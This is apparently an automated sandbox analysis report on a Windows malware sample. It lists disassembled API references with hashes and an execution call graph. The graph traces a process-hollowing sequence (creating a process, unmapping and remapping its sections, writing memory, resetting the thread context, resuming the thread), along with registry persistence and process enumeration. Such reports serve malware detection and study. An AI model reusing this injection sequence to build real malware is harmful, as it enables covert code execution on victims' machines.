                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 07A37C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 824e206e34768f4031e5ac984a14c5fbce41f919fc04f77d2be04685fbe91803
                                                                                                                                                • Instruction ID: 0b5df911970a5f63be62d84e9cbd0248dcf7b2dab8697a03b1cf7a72e6a126df
                                                                                                                                                • Opcode Fuzzy Hash: 824e206e34768f4031e5ac984a14c5fbce41f919fc04f77d2be04685fbe91803
                                                                                                                                                • Instruction Fuzzy Hash: 90218CB4A003589FCB10DF99D445BAEFBF5EB48324F108419E855AB340C779A984CFA1
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059B7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 0b60bab8251b0eae25a6fc9beae3055675b1fb7b34d42282e99973265ffe1605
                                                                                                                                                • Instruction ID: bf46fef5fb8cf0191db197975f75d2df02df2ef09b0e3f3b1b023376c35c4fcf
                                                                                                                                                • Opcode Fuzzy Hash: 0b60bab8251b0eae25a6fc9beae3055675b1fb7b34d42282e99973265ffe1605
                                                                                                                                                • Instruction Fuzzy Hash: 992168B1D003098FDB10CFA9C5857EEBBF4EF88324F14842AD459A7280D7789984CFA0
                                                                                                                                                APIs
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8D797
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                • Opcode ID: 74719c44dd516b5533a0758aa1d868f9e16f4b8b6298b81a61de8a0b89914c40
                                                                                                                                                • Instruction ID: 60520a413469d0e51e4d899f760774b035bddc32132de7323e9b51402c0493c3
                                                                                                                                                • Opcode Fuzzy Hash: 74719c44dd516b5533a0758aa1d868f9e16f4b8b6298b81a61de8a0b89914c40
                                                                                                                                                • Instruction Fuzzy Hash: 452103B5900249EFDB10CFAAD584ADEBFF4EB48324F14842AE954A3250D374A944CFA1
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059B7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 4cbc1ce2d482f1d8bd84c733b9416f1a3293f7e08756017df2ffc610acd26cf6
                                                                                                                                                • Instruction ID: 888139277831368eb9e252ae23c24c21e6f53318c9b13e15236ffba244657d7e
                                                                                                                                                • Opcode Fuzzy Hash: 4cbc1ce2d482f1d8bd84c733b9416f1a3293f7e08756017df2ffc610acd26cf6
                                                                                                                                                • Instruction Fuzzy Hash: 042118B1D043098FDB10DFAAC5857EEBBF4EF88324F14842AD459A7241C778A985CFA5
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059B7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: bce748675ad9b9647a7110d257ab56f87c95c740f375e33150d639b39a62a5f4
                                                                                                                                                • Instruction ID: 5105b45466f1add412e0983c70a6706e0d558f2c04bcf317aa3784cb0cb6de27
                                                                                                                                                • Opcode Fuzzy Hash: bce748675ad9b9647a7110d257ab56f87c95c740f375e33150d639b39a62a5f4
                                                                                                                                                • Instruction Fuzzy Hash: BB2139B1D003599FDB10DFAAC980AEEFBF5FF48310F50842AE959A7250C7749544CBA5
                                                                                                                                                APIs
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F8D797
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                • Opcode ID: be3fbe853261759847ba60448821ab39a5bdbdd49088c97fc0cfb4cd4dfa99c1
                                                                                                                                                • Instruction ID: 191a7dddc6603fcbf2bb420eaf8123f57c7233307e7b0903d1a68917932e1b81
                                                                                                                                                • Opcode Fuzzy Hash: be3fbe853261759847ba60448821ab39a5bdbdd49088c97fc0cfb4cd4dfa99c1
                                                                                                                                                • Instruction Fuzzy Hash: 9921E4B59002089FDB10CF9AD584ADEBBF4FB48320F14841AE914A3350D374A944CFA5
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 07A37C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1996183649.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7a30000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 7d124517b166aab01fce79b26a62acdb0cd0c0b4a0b0f82679a000e31fc04ab6
                                                                                                                                                • Instruction ID: f133a907d2fb94657a4ef5dca37a4419b0761c70e64d72b4717c6dea7f4dcfb1
                                                                                                                                                • Opcode Fuzzy Hash: 7d124517b166aab01fce79b26a62acdb0cd0c0b4a0b0f82679a000e31fc04ab6
                                                                                                                                                • Instruction Fuzzy Hash: 1C219DB09043589FCB11DF95D445BEEBFF4EB49320F00804AE855A7241C3386A84CFA1
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059B714E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 3383863c69bc28d85ae0df9bd62eb3f073d1e0d6b60e8851cd5d3df561b0303d
                                                                                                                                                • Instruction ID: 0301371865c5b5428d1d3522ba29bc036f0418fb9efd44dc7d171089160e3ad7
                                                                                                                                                • Opcode Fuzzy Hash: 3383863c69bc28d85ae0df9bd62eb3f073d1e0d6b60e8851cd5d3df561b0303d
                                                                                                                                                • Instruction Fuzzy Hash: A41126B2900249DFDB10DFA9C944BDFBBF5EF88324F20841AE559A7250C775A584CFA1
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059B714E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: a924b3c05b7925ba02613de6b6eea8004c829af5d52713f6714a4e6313c483d7
                                                                                                                                                • Instruction ID: 65cad87ecc8b94f7e4429780cce3b39870bc18643b83d61348605260ab7dfbd6
                                                                                                                                                • Opcode Fuzzy Hash: a924b3c05b7925ba02613de6b6eea8004c829af5d52713f6714a4e6313c483d7
                                                                                                                                                • Instruction Fuzzy Hash: B91167B18002488FDB10DFAAC944BDFBFF5EF88324F108419E519A7250C775A544CFA0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: dd282edbcf263eb8de8a823b5366f40934d8bf8200ebbe9a5be01d0b50c1b3ce
                                                                                                                                                • Instruction ID: 5740214d2fb5cc98834099e8fc08c9d21f5a9405809e78bea6ed3605fd944ae0
                                                                                                                                                • Opcode Fuzzy Hash: dd282edbcf263eb8de8a823b5366f40934d8bf8200ebbe9a5be01d0b50c1b3ce
                                                                                                                                                • Instruction Fuzzy Hash: 75E11C74E042598FDB14DFA9C5809AEFBF2FF88304F248169D418AB356D771A941CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 26a552c3cd9ef06a5634118814154f1bd8a2d2e705256439cd36544fc97b2038
                                                                                                                                                • Instruction ID: 476ec2abfbe87094e84d6ef2c26274258eea64b2e2c41596485e9d1c4b99aa3b
                                                                                                                                                • Opcode Fuzzy Hash: 26a552c3cd9ef06a5634118814154f1bd8a2d2e705256439cd36544fc97b2038
                                                                                                                                                • Instruction Fuzzy Hash: 72E11A74E042198FDB14DFA9C5809AEFBF2FF89304F248169E415AB35ADB70A941CF61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3588b7875829f2a2481af361e5a195172123a4a974913cb3e6066ecb65e904f3
                                                                                                                                                • Instruction ID: 256ce14167942f44aa5e47ae9a1a2e208fc54eed3446b267d8e4838093d47147
                                                                                                                                                • Opcode Fuzzy Hash: 3588b7875829f2a2481af361e5a195172123a4a974913cb3e6066ecb65e904f3
                                                                                                                                                • Instruction Fuzzy Hash: 04A18D36E002098FCF19EFB4C8405DEB7B6FF84310B25857AE802AB265DB75E959DB40
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 77d027f6d270065868b24f0f56521754c57ce6b7df01b2619875aceb35cbc701
                                                                                                                                                • Instruction ID: a6d472165f7d2264c09c96ccc5a1c4a1fa9916bc71297d5044a9dc406364a627
                                                                                                                                                • Opcode Fuzzy Hash: 77d027f6d270065868b24f0f56521754c57ce6b7df01b2619875aceb35cbc701
                                                                                                                                                • Instruction Fuzzy Hash: 5B514E75E042598FDB14CFA9C9815AEFBF2FF89304F2481AAD408A7316D7719942CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 53e62e9127e522fb533c0b8549676d75c330fdd75836f8f2f40a3f866d85347d
                                                                                                                                                • Instruction ID: 51fd6354fbd867b0e52c214761ad46e308bac01f6e3b1624ab3a48ab770a3c9b
                                                                                                                                                • Opcode Fuzzy Hash: 53e62e9127e522fb533c0b8549676d75c330fdd75836f8f2f40a3f866d85347d
                                                                                                                                                • Instruction Fuzzy Hash: F6512D75E042198FDB14CFA9C5805AEBBF2FF89304F24C669D418AB316D7719A41CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c65c2eaf736161268db9c2f3cbc62df7caed8f50cac787d42f2019924ef89b32
                                                                                                                                                • Instruction ID: d63848c5ac68491f6669383e9ced7c4fd3cd8315129ffa96f60d683ce813b335
                                                                                                                                                • Opcode Fuzzy Hash: c65c2eaf736161268db9c2f3cbc62df7caed8f50cac787d42f2019924ef89b32
                                                                                                                                                • Instruction Fuzzy Hash: EE510975E042198FDB14CFA9C6805AEFBF2FF89304F248169D418AB316D735A942CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 15355fd0ade92147b86d0f52b3718bbc422daa81afdbfd36eca87a2ab207598d
                                                                                                                                                • Instruction ID: 416db8d2df83fc968e0672e1317242cb623e2453a47d709af9ed7cf8ba884177
                                                                                                                                                • Opcode Fuzzy Hash: 15355fd0ade92147b86d0f52b3718bbc422daa81afdbfd36eca87a2ab207598d
                                                                                                                                                • Instruction Fuzzy Hash: EC51E7B5E042198FDB14DFAAC5805AEFBF2BF89304F24C169D418AB316D771A941CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b9a0bcdb4e84a6ac05b5e49cddb5d2efdec34ad3be520fa4270a3dc4c8bd2b51
                                                                                                                                                • Instruction ID: 28f91b33714b396d76cafec55585bc0f271aec822d198d6a65290969ce405190
                                                                                                                                                • Opcode Fuzzy Hash: b9a0bcdb4e84a6ac05b5e49cddb5d2efdec34ad3be520fa4270a3dc4c8bd2b51
                                                                                                                                                • Instruction Fuzzy Hash: 97512970E052198FDB14CFA9C6805AEFBF2FF89304F248169D418AB316D770A941CFA1

Execution Graph

Execution Coverage: 2.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 13%
Total number of Nodes: 843
Total number of Limit Nodes: 32
47010->47013 47014 40417e 28 API calls 47010->47014 47012 40f5eb 47011->47012 47018 40f5ff 47012->47018 47026 40f616 47012->47026 47354 4138b2 RegCreateKeyA 47013->47354 47015 40f707 47014->47015 47359 409196 28 API calls 47015->47359 47017 40f797 47021 401fd8 11 API calls 47017->47021 47020 401f09 11 API calls 47018->47020 47023 40f608 47020->47023 47021->47028 47022 40f724 47031 4185a3 31 API calls 47022->47031 47024 401f09 11 API calls 47023->47024 47024->47028 47025 40f657 47027 401f09 11 API calls 47025->47027 47026->47025 47357 41c076 OpenProcess 47026->47357 47027->47030 47028->46997 47030->46992 47033 40f735 47031->47033 47032 40f634 47032->47025 47034 40f638 47032->47034 47035 401f09 11 API calls 47033->47035 47358 40b9a7 28 API calls 47034->47358 47042 40f742 47035->47042 47037 40f649 47038 401f09 11 API calls 47037->47038 47040 40f652 47038->47040 47039 40f799 47041 401f09 11 API calls 47039->47041 47040->46985 47041->47013 47042->47039 47360 409196 28 API calls 47042->47360 47044 40f765 47045 4185a3 31 API calls 47044->47045 47046 40f776 47045->47046 47047 401f09 11 API calls 47046->47047 47048 40f783 47047->47048 47048->47039 47049 40f789 47048->47049 47050 40d0a4 2 API calls 47049->47050 47051 40f78e 47050->47051 47052 401f09 11 API calls 47051->47052 47052->47017 47053->46548 47054->46555 47055->46559 47057->46582 47058->46602 47059->46614 47060->46607 47061->46597 47062->46613 47063->46671 47064->46684 47065->46665 47067 40209b 47066->47067 47068 4023ce 11 API calls 47067->47068 47069 4020a6 47068->47069 47421 4024ed 47069->47421 47073 4137fa 47072->47073 47074 4137c3 47072->47074 47075 401fd8 11 API calls 47073->47075 47077 4137d5 RegSetValueExA RegCloseKey 47074->47077 47076 40efd9 47075->47076 47076->46686 47077->47073 47078->46690 47079->46697 47080->46707 47081->46715 47082->46726 47085 434563 47083->47085 47084 43bda0 _Yarn 21 API calls 47084->47085 47085->47084 47086 40f10c 47085->47086 47425 443001 7 API calls 2 library calls 47085->47425 
47426 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47085->47426 47427 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47085->47427 47086->46733 47090->46762 47091->46775 47092->46749 47093->46755 47095->46783 47097 413682 RegQueryValueExW RegCloseKey 47096->47097 47098 4136af 47096->47098 47097->47098 47099 40417e 28 API calls 47098->47099 47100 40f34e 47099->47100 47100->46793 47101->46603 47103->46627 47104->46639 47428 41ada8 104 API calls 47105->47428 47107 41b556 LoadResource LockResource SizeofResource 47106->47107 47108 40f419 47106->47108 47107->47108 47109 43bda0 47108->47109 47114 4461b8 ___crtLCMapStringA 47109->47114 47110 4461f6 47126 44062d 20 API calls _Atexit 47110->47126 47112 4461e1 RtlAllocateHeap 47113 4461f4 47112->47113 47112->47114 47113->46843 47114->47110 47114->47112 47125 443001 7 API calls 2 library calls 47114->47125 47117 4020bf 47116->47117 47127 4023ce 47117->47127 47119 4020ca 47131 40250a 47119->47131 47121 4020d9 47121->46846 47123 4020b7 28 API calls 47122->47123 47124 406e27 47123->47124 47124->46853 47125->47114 47126->47113 47128 4023d8 47127->47128 47129 402428 47127->47129 47128->47129 47138 4027a7 47128->47138 47129->47119 47132 40251a 47131->47132 47133 402535 47132->47133 47135 402520 47132->47135 47159 4028e8 47133->47159 47149 402569 47135->47149 47137 402533 47137->47121 47139 402e21 47138->47139 47142 4016b4 47139->47142 47141 402e30 47141->47129 47143 4016cb 47142->47143 47144 4016c6 47142->47144 47143->47144 47145 4016f3 47143->47145 47148 43bd68 11 API calls _Atexit 47144->47148 47145->47141 47147 43bd67 47148->47147 47170 402888 47149->47170 47151 40257d 47152 402592 47151->47152 47153 4025a7 47151->47153 47175 402a34 22 API calls 47152->47175 47155 4028e8 28 API calls 47153->47155 47158 4025a5 47155->47158 47156 40259b 47176 4029da 22 API calls 47156->47176 47158->47137 47160 4028f1 47159->47160 47161 402953 47160->47161 47162 4028fb 47160->47162 47184 
4028a4 22 API calls 47161->47184 47165 402904 47162->47165 47167 402917 47162->47167 47178 402cae 47165->47178 47168 402915 47167->47168 47169 4023ce 11 API calls 47167->47169 47168->47137 47169->47168 47171 402890 47170->47171 47172 402898 47171->47172 47177 402ca3 22 API calls 47171->47177 47172->47151 47175->47156 47176->47158 47179 402cb8 __EH_prolog 47178->47179 47185 402e54 22 API calls 47179->47185 47181 4023ce 11 API calls 47183 402d92 47181->47183 47182 402d24 47182->47181 47183->47168 47185->47182 47187 4020e7 47186->47187 47188 4023ce 11 API calls 47187->47188 47189 4020f2 47188->47189 47189->46862 47190->46862 47192 41ced2 47191->47192 47193 41cf31 47192->47193 47197 41cee2 47192->47197 47194 41cf4b 47193->47194 47195 41d071 28 API calls 47193->47195 47212 41d1d7 28 API calls 47194->47212 47195->47194 47198 41cf1a 47197->47198 47203 41d071 47197->47203 47211 41d1d7 28 API calls 47198->47211 47199 41cf2d 47199->46862 47202->46871 47205 41d079 47203->47205 47204 41d0ab 47204->47198 47205->47204 47206 41d0af 47205->47206 47209 41d093 47205->47209 47223 402725 22 API calls 47206->47223 47213 41d0e2 47209->47213 47211->47199 47212->47199 47214 41d0ec __EH_prolog 47213->47214 47224 402717 22 API calls 47214->47224 47216 41d0ff 47225 41d1ee 11 API calls 47216->47225 47218 41d125 47220 41d15d 47218->47220 47226 402730 11 API calls 47218->47226 47220->47204 47221 41d144 47227 402712 11 API calls std::_Deallocate 47221->47227 47224->47216 47225->47218 47226->47221 47227->47220 47228->46885 47229->46890 47230->46888 47233 4032aa 47232->47233 47234 4028e8 28 API calls 47233->47234 47235 4032c9 47233->47235 47234->47235 47235->46901 47237 4051fb 47236->47237 47246 405274 47237->47246 47239 405208 47239->46904 47241 402061 47240->47241 47242 4023ce 11 API calls 47241->47242 47243 40207b 47242->47243 47251 40267a 47243->47251 47247 405282 47246->47247 47250 4028a4 22 API calls 47247->47250 47252 40268b 47251->47252 47253 4023ce 11 API calls 47252->47253 47254 40208d 
47253->47254 47254->46907 47255->46915 47256->46920 47259 41b362 47258->47259 47260 41c055 GetCurrentProcess 47258->47260 47261 4135e1 RegOpenKeyExA 47259->47261 47260->47259 47262 413639 47261->47262 47263 41360f RegQueryValueExA RegCloseKey 47261->47263 47264 402093 28 API calls 47262->47264 47263->47262 47265 41364e 47264->47265 47265->46934 47266->46942 47268 40b947 47267->47268 47273 402252 47268->47273 47270 40b952 47277 40b967 47270->47277 47272 40b961 47272->46953 47274 4022ac 47273->47274 47275 40225c 47273->47275 47274->47270 47275->47274 47284 402779 11 API calls std::_Deallocate 47275->47284 47278 40b9a1 47277->47278 47279 40b973 47277->47279 47296 4028a4 22 API calls 47278->47296 47285 4027e6 47279->47285 47283 40b97d 47283->47272 47284->47274 47286 4027ef 47285->47286 47287 402851 47286->47287 47288 4027f9 47286->47288 47298 4028a4 22 API calls 47287->47298 47291 402802 47288->47291 47292 402815 47288->47292 47297 402aea 28 API calls __EH_prolog 47291->47297 47293 402813 47292->47293 47295 402252 11 API calls 47292->47295 47293->47283 47295->47293 47297->47293 47299->46956 47300->46956 47302 401f8e 47301->47302 47303 402252 11 API calls 47302->47303 47304 401f99 CreateToolhelp32Snapshot Process32FirstW 47303->47304 47304->46983 47306 404186 47305->47306 47307 402252 11 API calls 47306->47307 47308 404191 47307->47308 47361 4041bc 47308->47361 47312 41c292 OpenProcess 47311->47312 47313 41c2ac K32GetProcessImageFileNameW 47311->47313 47312->47313 47314 41c2a5 47312->47314 47315 41c2c4 CloseHandle 47313->47315 47316 41c2cc CloseHandle 47313->47316 47318 40417e 28 API calls 47314->47318 47315->47314 47373 41c0ac lstrlenW 47316->47373 47319 40f5d8 47318->47319 47319->47008 47321 413656 31 API calls 47320->47321 47322 41b737 47321->47322 47390 445825 37 API calls 2 library calls 47322->47390 47324 41b746 47391 409049 28 API calls 47324->47391 47326 41b763 47327 401f13 28 API calls 47326->47327 47328 41b76b 47327->47328 47329 401f09 11 API calls 
47328->47329 47330 41b773 47329->47330 47392 409097 28 API calls 47330->47392 47332 41b77e 47393 41bdd3 28 API calls 47332->47393 47334 41b787 47335 401f13 28 API calls 47334->47335 47336 41b792 47335->47336 47337 401f09 11 API calls 47336->47337 47338 41b79a 47337->47338 47339 41c048 GetCurrentProcess 47338->47339 47341 41b7d5 _wcslen 47339->47341 47340 40f672 47340->46984 47341->47340 47394 41cfd5 28 API calls 47341->47394 47344 41c540 GetFileSize 47343->47344 47345 41c53c 47343->47345 47395 40244e 47344->47395 47345->47004 47347 41c554 47348 41c566 ReadFile 47347->47348 47349 41c573 47348->47349 47350 41c575 CloseHandle 47348->47350 47349->47350 47350->47345 47400 41812a 47351->47400 47355 4138f4 47354->47355 47356 4138ca RegSetValueExA RegCloseKey 47354->47356 47355->47017 47356->47355 47357->47032 47358->47037 47359->47022 47360->47044 47362 4041c8 47361->47362 47365 4041d9 47362->47365 47364 40419c 47364->47001 47366 4041e9 47365->47366 47367 404206 47366->47367 47368 4041ef 47366->47368 47369 4027e6 28 API calls 47367->47369 47372 404267 28 API calls 47368->47372 47371 404204 47369->47371 47371->47364 47372->47371 47374 41c0d1 _memcmp 47373->47374 47379 41c108 ctype 47373->47379 47377 41c0f1 lstrlenW 47374->47377 47374->47379 47375 41c126 FindFirstVolumeW 47376 41c146 GetLastError 47375->47376 47380 41c153 _wcslen 47375->47380 47378 41c1f9 47376->47378 47377->47374 47377->47379 47378->47314 47379->47375 47381 41c1e3 47380->47381 47383 41c174 QueryDosDeviceW 47380->47383 47382 41c1e8 FindVolumeClose 47381->47382 47382->47378 47384 41c261 GetLastError 47383->47384 47385 41c19c lstrcmpW 47383->47385 47384->47382 47386 41c213 GetVolumePathNamesForVolumeNameW 47385->47386 47387 41c1af FindNextVolumeW 47385->47387 47386->47384 47389 41c23b lstrcatW lstrcpyW 47386->47389 47387->47380 47388 41c204 GetLastError 47387->47388 47388->47381 47388->47382 47389->47382 47390->47324 47391->47326 47392->47332 47393->47334 47394->47340 47396 402456 47395->47396 47397 402460 
47396->47397 47399 402a51 28 API calls 47396->47399 47397->47347 47399->47397 47401 418157 8 API calls 47400->47401 47402 4181c4 ___scrt_fastfail 47401->47402 47420 41847b CloseHandle CloseHandle 47401->47420 47403 41822a CreateProcessW 47402->47403 47402->47420 47404 418260 VirtualAlloc Wow64GetThreadContext 47403->47404 47405 4184b5 GetLastError 47403->47405 47406 41847f VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 47404->47406 47407 41828e ReadProcessMemory 47404->47407 47405->47420 47406->47420 47407->47406 47408 4182b4 NtCreateSection 47407->47408 47408->47406 47409 4182dc 47408->47409 47410 4182eb NtUnmapViewOfSection 47409->47410 47411 4182fc NtMapViewOfSection 47409->47411 47410->47411 47412 418320 VirtualFree NtClose TerminateProcess 47411->47412 47413 418368 GetCurrentProcess NtMapViewOfSection 47411->47413 47412->47401 47414 418363 47412->47414 47413->47406 47415 418395 ctype 47413->47415 47414->47420 47416 418431 WriteProcessMemory 47415->47416 47417 418454 Wow64SetThreadContext 47415->47417 47416->47406 47418 418450 47416->47418 47417->47406 47419 41846d ResumeThread 47417->47419 47418->47417 47419->47406 47419->47420 47420->47010 47422 4024f9 47421->47422 47423 40250a 28 API calls 47422->47423 47424 4020b1 47423->47424 47424->46678 47425->47085 47436 412829 61 API calls 47429->47436 47438 443248 CallUnexpected 47437->47438 47439 443260 47438->47439 47440 443396 _Atexit GetModuleHandleW 47438->47440 47459 445909 EnterCriticalSection 47439->47459 47442 443254 47440->47442 47442->47439 47471 4433da GetModuleHandleExW 47442->47471 47446 443268 47449 4432dd 47446->47449 47456 443306 47446->47456 47479 443ff0 20 API calls _Atexit 47446->47479 47447 443323 47463 443355 47447->47463 47448 44334f 47482 4577a9 5 API calls CatchGuardHandler 